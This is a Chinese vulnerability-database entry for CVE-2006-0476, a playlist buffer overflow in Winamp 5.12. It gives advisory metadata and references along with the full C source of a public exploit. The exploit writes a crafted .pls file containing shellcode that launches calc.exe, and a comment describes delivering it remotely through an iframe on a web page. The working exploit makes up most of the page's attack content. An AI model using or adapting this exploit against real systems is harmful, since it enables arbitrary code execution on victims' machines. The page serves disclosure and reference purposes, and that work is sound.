Nullsoft Winamp畸形播放列表文件处理远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109684 漏洞类型 缓冲区溢出
发布时间 2006-01-29 更新时间 2007-11-02
CVE编号 CVE-2006-0476 CNNVD-ID CNNVD-200601-367
漏洞平台 Windows CVSS评分 7.6
|漏洞来源
https://www.exploit-db.com/exploits/1458
https://www.securityfocus.com/bid/16410
https://cxsecurity.com/issue/WLB-2006010072
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-367
|漏洞详情
Winamp是Nullsoft发布的免费音频播放器,支持多种音频格式。Winamp在处理播放列表文件时存在缓冲区溢出漏洞。攻击者可以构造超长的完整路径,该路径可以是实际上并不存在的文件共享的文件名或UNC名。如果用户打开了上述文件的话,就会覆盖栈缓冲区,导致执行任意代码。
|漏洞EXP
/*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Tested with :
* Winamp 5.12 on Win XP Pro Sp2
*
*/

/*
* Usage:
*
* Execute exploit, it will create "crafted.pls" in current directory.
* Duble click the file, or single click right and then select "open".
* And Winamp will launch a Calculator (calc.exe)
*
*/

/*
*
* For to use it remotly,
* make a html page containing an iframe linking to the .pls file.
*
* http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN         0x045D
#define PLAYLIST_FILE   "crafted.pls"

char szPlayListHeader1[] = "[playlist]\r\nFile1=\\\\";
char szPlayListHeader2[] = "\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n";

// Jump to shellcode
char jumpcode[] = "\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4";

// Harmless Calc.exe
char shellcode[] =
        "\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
        "\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
	"\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4"
	"\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12"
	"\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69"
        "\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6"
	"\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5"
	"\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21"
	"\x61\xdd\x0e\x4d";


int main(int argc,char *argv[])
{
        printf("\nWinamp 5.12 Remote Buffer Overflow Universal Exploit");
        printf("\nBug discovered & exploit coded by ATmaCA");
        printf("\nWeb: http://www.spyinstructors.com  && http://www.atmacasoft.com");
        printf("\nE-Mail: atmaca@icqmail.com");
        printf("\nCredit to Kozan");

        FILE *File;
        char *pszBuffer;

        if ( (File = fopen(PLAYLIST_FILE,"w+b")) == NULL ) {
                printf("\n [Err:] fopen()");
                exit(1);
        }

        pszBuffer = (char*)malloc(BUF_LEN);
        memset(pszBuffer,0x90,BUF_LEN);
        memcpy(pszBuffer,szPlayListHeader1,sizeof(szPlayListHeader1)-1);
        memcpy(pszBuffer+0x036C,shellcode,sizeof(shellcode)-1);
        memcpy(pszBuffer+0x0412,jumpcode,sizeof(jumpcode)-1);
        memcpy(pszBuffer+0x0422,szPlayListHeader2,sizeof(szPlayListHeader2)-1);

        fwrite(pszBuffer, BUF_LEN, 1,File);
        fclose(File);

        printf("\n\n"  PLAYLIST_FILE  " has been created in the current directory.\n");
        return 1;
}

// milw0rm.com [2006-01-29]
|受影响的产品
NullSoft Winamp 5.12 NullSoft Winamp 5.11
|参考资料

来源:US-CERT
名称:TA06-032A
链接:http://www.us-cert.gov/cas/techalerts/TA06-032A.html
来源:US-CERT
名称:VU#604745
链接:http://www.kb.cert.org/vuls/id/604745
来源:VUPEN
名称:ADV-2006-0361
链接:http://www.frsirt.com/english/advisories/2006/0361
来源:SECUNIA
名称:18649
链接:http://secunia.com/advisories/18649
来源:XF
名称:winamp-playlist-computername-bo(24361)
链接:http://xforce.iss.net/xforce/xfdb/24361
来源:MISC
链接:http://www.winamp.com/player/version_history.php
来源:BID
名称:16410
链接:http://www.securityfocus.com/bid/16410
来源:BUGTRAQ
名称:20060131Re:Re:Winamp5.12-0dayexploit-codeexecutionthroughplaylist
链接:http://www.securityfocus.com/archive/1/archive/1/423548/100/0/threaded
来源:BUGTRAQ
名称:20060130Winamp5.12-0dayexploit-codeexecutionthroughplaylist
链接:http://www.securityfocus.com/archive/1/423436/100/0/threaded
来源:OSVDB
名称:22789
链接:http://www.osvdb.org/22789
来源:MISC
链接:http://www.heise.de/newsticker/meldung/68981
来源:SECTRACK
名称:1015552
链接:http://securitytracker.com/id?1015552
来源:MILW0RM
名称:3422
链接:http://www.milw0rm.com/e